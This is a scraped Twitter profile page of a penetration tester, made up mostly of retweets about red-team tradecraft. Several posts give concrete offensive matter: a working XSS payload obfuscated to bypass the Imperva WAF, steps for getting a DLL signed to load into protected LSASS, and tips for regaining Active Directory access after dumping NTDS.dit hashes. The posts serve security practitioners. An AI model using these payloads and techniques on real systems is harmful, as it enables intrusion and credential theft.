furkan özer

@frknozr

| Cyberstruggle Ranger | OSCP |

synack.blog
Vrijeme pridruživanja: prosinac 2012.
15 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @frknozr

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @frknozr

  1. Prikvačeni tweet
    26. kol 2017.

    I am collecting/writing redteam and pentest tips. Please send yours. Also feedback is welcomed.

    19 proslijeđenih tweetova 35 korisnika označava da im se sviđa
    Poništi
  2. proslijedio/la je Tweet
    22. sij

    Here is the link to the SpecterOps Adversary Tactics: PowerShell course material: Enjoy! For information about our current training offerings, information can be found here: (4/4)

    20 replies 533 proslijeđena tweeta 952 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    16. sij

    CVE-2020-0601 - PoC for code signing PE files using a Certificate Authority using ECC

    5 replies 336 proslijeđenih tweetova 578 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    3. sij

    serverless patterns

    1 proslijeđeni tweet 5 korisnika označava da im se sviđa
    Poništi
  5. proslijedio/la je Tweet
    29. pro 2019.

    How to prepare a dll to be loaded into LSASS with protection mode? -Get an EV Code signing cert (300$) -Open a MS partner account -add the "hardware" program -go to "file signing service" - prepare a cab containing the dll - sign the cab with your cert - submit and wait 1 hour

    165 proslijeđenih tweetova 371 korisnik označava da mu se sviđa
    Poništi
  6. proslijedio/la je Tweet
    11. pro 2019.

    When an advisary (pentester, red team, attacker, etc) dumps hashes from the AD database file (NTDS.dit), they own the AD environment. They can use the hashes directly or crack them for clear text pw. NTDS.dit includes user & computer hashes which means all have to change. Why?

    Dumped NTDS.dit. Had everyone’s hash. Cracked majority of them and had their clear text password. Target forced password reset on all users. I took passwords that ended in a number, added 1 to that number, and gained access to that environment again.
    62 proslijeđena tweeta 212 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    11. pro 2019.

    When an attacker dumps NTDS.dit, they have user & computer hashes, including Domain Controller hashes. Create Silver Ticket w/ computer hash & regain full AD control: Mitigation: Force all computers to change pw every 1 day via GPO. More in link above

    47 proslijeđenih tweetova 120 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    5. pro 2019.

    Cobalt Strike 4.0 – Bring Your Own Weaponization

    16 replies 313 proslijeđenih tweetova 615 korisnika označava da im se sviđa
    Poništi
  9. proslijedio/la je Tweet
    4. pro 2019.

    We have categorized , mostly related, from public resources and sample details are available on . The project will keep updated and hope to help the security community fight against malware and targeted attack.

    100 proslijeđenih tweetova 161 korisnik označava da mu se sviđa
    Poništi
  10. proslijedio/la je Tweet
    4. pro 2019.

    I’ve been waiting for this for most of the year. Craig Koorn built a BloodHound for AWS IAM & related elements. Which finally just got a public release. Hugely useful for securing your AWS environments. cc

    153 proslijeđena tweeta 325 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    3. pro 2019.

    Experience the first full IDE for machine learning with Amazon SageMaker Studio!

    Experience the first full IDE for machine learning with Amazon SageMaker Studio!
    51 proslijeđeni tweet 85 korisnika označava da im se sviđa
    Poništi
  12. proslijedio/la je Tweet
    29. stu 2019.

    RT this tweet before 10 December and get a chance to gain 3 months training SCADA security lab access!

    18 proslijeđenih tweetova 4 korisnika označavaju da im se sviđa
    Poništi
  13. proslijedio/la je Tweet
    24. stu 2019.

    Bu dünyada bizim kadar zulüm gören hiçbir insan görmedim. Hatta bizden daha çok ezilmiş hayvan bile görmedim! Zalimin eline hiç kimse 'lılar kadar sahipsiz bırakılmadı.

    4.496 proslijeđenih tweetova 6.919 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    21. stu 2019.

    New blog post time! This one looking at how we can use AMSI to help automate getting our payloads past AV.

    6 replies 196 proslijeđenih tweetova 372 korisnika označavaju da im se sviđa
    Poništi
  15. proslijedio/la je Tweet
    17. stu 2019.

    is a Response IR tool aimed to help people to get their incident response tasks done in a short time with a little amount of help. Thanks to & for inspiring the CLI :) Thanks to team for the opportunity.

    15 proslijeđenih tweetova 26 korisnika označava da im se sviđa
    Poništi
  16. proslijedio/la je Tweet
    16. stu 2019.

    Haram to be Muslim

    27 replies 13.237 proslijeđenih tweetova 5.013 korisnika označava da im se sviđa
    Poništi
  17. proslijedio/la je Tweet
    3. ožu 2015.

    Advice for the aspiring Pentester: Put down the books and pick up Windows Internals. There's opportunity on every page.

    19 replies 169 proslijeđenih tweetova 360 korisnika označava da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    20. lis 2019.

    Imperva WAF Bypass for XSS; <details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - without parentheses, 'alert', 'document.domain' , 'window' , space

    1 reply 169 proslijeđenih tweetova 361 korisnik označava da mu se sviđa
    Poništi
  19. 20. lis 2019.

    1 korisnik označava da mu se sviđa
    Poništi
  20. proslijedio/la je Tweet
    15. lis 2019.

    Releasing my bloodhound helper tool, cypheroth. It helps save time you would have spent running bloodhound cypher queries in the neo4j web interface by dumping all the important info out to spreadsheets. Comes with a great set of starting queries.

    163 proslijeđena tweeta 386 korisnika označava da im se sviđa
    Poništi
  21. proslijedio/la je Tweet
    14. lis 2019.

    [Blog] Office 365 was vulnerable to network attacks due to a vulnerability in Microsoft Teams. Here's a demo of an attacker obtaining access to all emails and OneDrive/SharePoint files if the victim joins an attacker controlled network. Details:

    13 replies 531 proslijeđeni tweet 903 korisnika označavaju da im se sviđa
    Poništi

@frknozr još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·